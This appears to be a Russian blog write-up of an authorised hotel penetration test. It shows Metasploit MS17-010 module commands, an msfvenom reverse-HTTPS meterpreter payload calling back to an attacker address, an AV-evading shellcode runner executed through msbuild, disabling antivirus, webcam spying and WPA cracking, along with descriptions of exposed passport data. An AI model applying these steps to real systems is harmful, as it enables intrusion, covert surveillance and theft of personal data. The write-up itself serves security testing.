Взлом Отеля
Сегодня речь пойдет про пентест отеля. Все действия были регламентированы и выполнялись в рамках проекта.
Все совпадения описанные в данной статье являются случайными, а персонажи вымышленными.
По согласованию данного проекта, я должен был протестировать сеть гостишки и попробовать нанести хоть какой то импакт. Первым делом я начал искать роутер в номере, но его не оказалось, а сетевая розетка была обнаружена за TV.
Не долго думая, я подрубился в сеть и начал сканирование на предмет Gateway.
Определив, адресацию, включил скан на всю 24 подсеть. Там нашлось много чего, как всегда это были Win7, Win Server 2008 и далее по списку. Окей, самые простые цели у нас это семерочки, которые я посканировал модулем метасплоита:
msf > use auxiliary/scanner/smb/smb_ms17_010
Обнаружил что 2 из 5 хостов содержат MS17-010 и в ход пошел модуль:
use auxiliary/admin/smb/ms17_010_command
Далее смог протолкнуться на хост директора и администратора на ресепшен.
Директорский ПК содержал информацию: договоры , документы для налоговой, пару паспортов и токены.
Что касается ПК персонала, то там огромная база паспортов, договоров, фоток. Короче пак персональных данных.
Далее необходимо было сделать закрепление, т.к. сидеть сутками не сильно интересное занятие. Сняв админские креды я аутентифицировался на Win 10 - это был второй ПК на ресепшене. Для закрепа будучи с правами Администратора мне потребовалось отключил AV и воспользовался техникой получения обратной оболочки от метера.
Эта методика позволяет обойти некоторую защиту и оставаться в системе более менее без палева, напишу шаги для реализации:
1) Генерируем полезную нагрузку через фреймфорк:
msfvenom -p windows/×64/meterpreter/reverse_https LOST=192.168.49.122 LPORT=443 -f raw -o meter.bin
2) Клонируем себе репу: https://github.com/kymb0/Stealth_shellcode_runners и запускаем генерацию xml файлика:
generator.py meter.bin
3) Запускаем встроенный майками билдер на атакуемом хосте
C: \Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
Теперь имея оболочку метера я мог наблюдать в лайф режиме за персоналом через веб-камеру, делать снапшоты рабочего стола, слушать о чем говорят сотрудники и так далее.
Какой импакт на текущем шаге я имел:
- захват персональных данных (актуальных)
- доступ к документации
- доступ ко всем хостам в локальной сети
- возможность сталкерить за сотрудниками (веб-камеры, переписки, разговоры и т.п.)
Оставим в покое тему что я нашел еще на сетевых узлах, т.к. логически можно прикинуть самому.
Далее пошло в ход тестирование Wi-Fi сети, где через WPA получилось хакнуть 16 точек, в том числе соседнюю кафешку :D Ее я тестить конечно же не стал... с ТЗ такого не было.
Через вафлю как полагается по старым следам сделал все тоже самое, что и через провод.
В ходе проведения работ выяснилось, что кафе принадлежало тому же владельцу, что и гостиница, поэтому ее поковырять мне также разрешили.
Там из интересного были найдены технологические карты по приготовлению блюд и коктейлей :D
Итог: непонятно теперь, как при заселении в гостишку давать свой паспорт для регистрации, зная что он может попасть в руки мошеннику или хакеру. Ведь это был тест всего одной гостиницы, а сколько таких по стране...